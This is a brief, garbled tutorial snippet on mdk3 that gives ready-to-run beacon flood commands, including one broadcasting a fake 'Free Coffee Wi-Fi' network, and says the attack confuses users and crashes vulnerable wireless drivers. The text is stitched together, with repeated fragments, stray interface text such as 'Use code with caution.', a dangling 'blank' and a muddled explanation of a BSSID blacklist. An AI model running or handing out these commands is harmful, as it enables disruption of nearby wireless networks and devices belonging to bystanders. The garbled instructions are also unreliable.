Tutorial: Mdk3

sudo mdk3 wlan0mon b -n "Free Coffee Wi-Fi" -c 6

The Beacon Flood mode transmits thousands of fake 802.11 beacon frames. This makes hundreds of fake network names appear on nearby devices, confusing users and crashing vulnerable wireless client drivers. Basic Random Flood: sudo mdk3 wlan0mon b Use code with caution. Advanced Targeted Dictionary Flood: mdk3 tutorial

Create blacklist.txt with the BSSIDs you want to attack. Everything else is ignored. sudo mdk3 wlan0mon b -n "Free Coffee Wi-Fi"

MDK3 uses a simple command-line syntax: mdk3 <interface> <mode> [options] [options] Start monitor mode:

Start monitor mode:

blank